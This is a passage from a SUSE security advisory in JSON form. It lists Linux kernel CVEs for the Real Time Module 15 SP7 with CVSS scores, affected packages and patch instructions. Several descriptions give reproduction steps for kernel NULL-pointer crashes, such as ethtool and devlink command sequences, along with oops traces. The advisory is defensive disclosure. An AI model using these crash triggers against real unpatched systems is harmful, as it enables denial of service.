"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
